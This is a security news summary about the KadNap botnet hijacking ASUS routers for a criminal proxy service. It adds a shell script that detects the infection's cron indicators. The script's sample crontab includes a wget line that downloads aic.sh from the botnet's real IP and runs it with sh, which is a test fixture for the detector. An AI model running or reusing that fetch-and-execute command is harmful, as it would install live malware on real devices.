New KadNap botnet hijacks ASUS routers to fuel cybercrime proxy network

KadNap is a newly discovered botnet that has infected roughly 14,000 ASUS routers and other edge devices, forming a peer-to-peer network that uses a custom Kademlia-based DHT to hide its command-and-control infrastructure. Researchers at Black Lotus Labs link KadNap to the Doppelganger proxy service, note heavy infection concentration in the United States, and report that Lumen has blocked traffic to the botnet’s control infrastructure on its network.

Key points

  • KadNap has grown to about 14,000 infected edge devices since August 2025.
  • The botnet uses a modified Kademlia DHT to decentralize C2 communications and evade detection.
  • Infections begin with aic.sh downloaded from 212.104.141[.]140, which installs an ELF “kad” binary and a cron job that runs every 55 minutes.
  • Nearly half of the network links to ASUS-dedicated C2 infrastructure, and 60% of infected devices are in the United States.
  • KadNap is tied to the Doppelganger proxy service (a Faceless rebrand) that monetizes access for DDoS and credential-stuffing, and Lumen has blocked related traffic on its network.
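
Added example, not from the article or from Black Lotus Labs: a shell check that matches cron entries against the indicators listed in the key points (the download IP, aic.sh, a "kad" binary, the 55-minute schedule). The minute-field forms `55` and `*/55`, the sample crontab and every path in it are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: match cron entries against the KadNap indicators in the key points.
# The download IP is kept defanged as on the page and refanged only at run time.
IOC_IP=$(printf '%s' '212.104.141[.]140' | sed 's/\[\.\]/./g')

# kadnap_scan_cron FILE: prints "SEVERITY<TAB>REASONS<TAB>ENTRY" per flagged line.
# Exit status is 0 if at least one entry was flagged, 1 if none.
kadnap_scan_cron() {
    awk -v ip="$IOC_IP" '
        /^[ \t]*(#|$)/ { next }                      # skip comments and blank lines
        {
            strong = ""; weak = ""
            if (index($0, ip))       strong = strong "download-ip,"
            if (index($0, "aic.sh")) strong = strong "aic.sh,"
            # A path component or command word that is exactly "kad".
            if ($0 ~ /(^|[\/ \t])kad([ \t;&|]|$)/) strong = strong "kad-binary,"
            # Assumption: the 55-minute job appears as minute field 55 or */55.
            if ($1 == "55" || $1 == "*/55") weak = "55-minute-schedule,"
            if (strong == "" && weak == "") next
            sev = (strong != "") ? "high" : "review" # schedule alone is a weak signal
            reasons = strong weak
            sub(/,$/, "", reasons)
            print sev "\t" reasons "\t" $0
            hits++
        }
        END { exit (hits > 0 ? 0 : 1) }
    ' "$1"
}

# Constructed sample crontab (not taken from an infected device).
kadnap_sample_crontab() {
    cat <<EOF
# nightly log rotation
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
55 * * * * /usr/bin/ntp-sync
*/55 * * * * wget -q -O /tmp/aic.sh http://${IOC_IP}/aic.sh && sh /tmp/aic.sh
@reboot /jffs/.example/kad
30 2 * * 0 /usr/bin/kadmin-backup
EOF
}

# Demo: scan the constructed sample and print the flagged entries.
tmp=$(mktemp) && kadnap_sample_crontab > "$tmp"
kadnap_scan_cron "$tmp"; rm -f "$tmp"
```

An entry flagged only for its schedule is reported as "review" rather than "high", since legitimate jobs can share that minute field.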

Read More: https://www.bleepingcomputer.com/news/security/new-kadnap-botnet-hijacks-asus-routers-to-fuel-cybercrime-proxy-network/